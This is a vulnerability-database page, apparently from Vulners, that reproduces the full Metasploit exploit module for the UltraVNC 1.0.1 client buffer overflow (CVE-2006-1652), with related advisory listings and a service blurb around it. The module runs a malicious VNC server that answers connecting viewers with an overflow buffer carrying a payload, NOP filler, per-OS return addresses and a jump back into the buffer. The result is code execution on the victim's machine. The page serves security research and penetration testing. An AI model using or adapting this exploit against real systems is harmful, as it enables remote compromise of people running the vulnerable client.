Lucene search
K

UltraVNC 1.0.1 Client Buffer Overflow

🗓️ 14 Dec 2006 19:41:37Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 26 Views

UltraVNC 1.0.1 Client Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-1652
30 Apr 201000:00
circl
Check Point Advisories
UltraVNC VNCLog Buffer Overflow - Ver2 (CVE-2006-1652)
28 Dec 201400:00
checkpoint_advisories
Check Point Advisories
UltraVNC VNCLog Buffer Overflow - Ver2 (CVE-2006-1652)
28 Dec 201400:00
checkpoint_advisories
CVE
CVE-2006-1652
6 Apr 200610:00
cve
Cvelist
CVE-2006-1652
6 Apr 200610:00
cvelist
Exploit DB
UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)
30 Apr 201000:00
exploitdb
NVD
CVE-2006-1652
6 Apr 200610:04
nvd
OpenVAS
www too long url
23 Jun 200900:00
openvas
OpenVAS
WWW Too Long URL DoS Vulnerability
23 Jun 200900:00
openvas
Packet Storm
UltraVNC 1.0.1 Client Buffer Overflow
26 Nov 200900:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in UltraVNC Win32
        Viewer 1.0.1 Release.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-1652' ],
          [ 'OSVDB', '24456' ],
          [ 'BID', '17378' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
          [ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
          [ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2006-04-04',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ])
  end

  def on_client_connect(client)

    rfb = "RFB 003.006\n"

    client.put(rfb)
  end

  def on_client_data(client)
    return if ((p = regenerate_payload(client)) == nil)

    filler = make_nops(980 - payload.encoded.length)

    sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
    sploit << payload.encoded + filler + [target.ret].pack('V')
    sploit << "PASSWORD" + [0xe8, -997].pack('CV')

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    handler
    service.close_client(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.5High risk
Vulners AI Score7.5
CVSS 29
EPSS0.67398
26